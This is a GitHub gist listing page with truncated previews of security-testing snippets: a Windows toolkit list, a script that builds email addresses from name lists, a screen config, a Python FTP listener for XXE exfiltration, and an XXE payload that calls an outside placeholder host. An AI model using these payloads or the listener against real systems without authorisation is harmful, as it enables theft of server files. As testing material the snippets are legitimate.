Skip to content

Instantly share code, notes, and snippets.

View phin3has's full-sized avatar

Brandon E. phin3has

110 followers · 18 following
View GitHub Profile
@jthuraisamy
jthuraisamy / windows-toolkit.md
Last active April 12, 2022 20:00
Windows Toolkit

Windows Toolkit

Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed
@phin3has
phin3has / whowho.py
Last active July 9, 2018 21:33
Compiles email addresses from a .csv of first and last names
#!/usr/bin/python
__author__ = '@awhitehatter'
__version__= 1.0
'''
WhoWho is script that builds username addresses from CSV imports.
example:
From test.csv:
first_name,last_name
@phin3has
phin3has / .screenrc
Created October 20, 2015 22:11
hardstatus on
hardstatus alwayslastline
hardstatus string "%{.bW}%-w%{.rW}%n %t%{-}%+w %=%{..G}%H %{..Y}%m/%d/%y %c:%s"
defscrollback 1024
vbell off
startup_message off
@staaldraad
staaldraad / xxeftp.py
Created July 2, 2015 09:22
Python FTP server for XXE
#!/usr/env/python
from __future__ import print_function
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',2121))
s.listen(1)
print('XXE-FTP listening ')
conn,addr = s.accept()
print('Connected by %s',addr)
@staaldraad
staaldraad / XXE_payloads
Last active May 8, 2024 01:23
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>